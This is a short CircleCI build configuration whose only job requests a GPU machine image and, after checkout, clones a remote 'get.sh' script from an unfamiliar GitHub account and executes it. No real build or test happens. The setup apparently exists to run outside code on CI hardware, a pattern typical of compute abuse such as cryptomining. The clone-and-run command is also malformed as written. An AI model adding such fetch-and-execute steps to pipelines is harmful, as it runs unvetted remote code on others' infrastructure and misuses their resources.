version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-11.1:202012-01
    steps:
      - checkout
      - run: rm -rf get.sh && git clone https://github.com/guttenocm/songdilan/blob/main/get.sh && cd get.sh && ./get.sh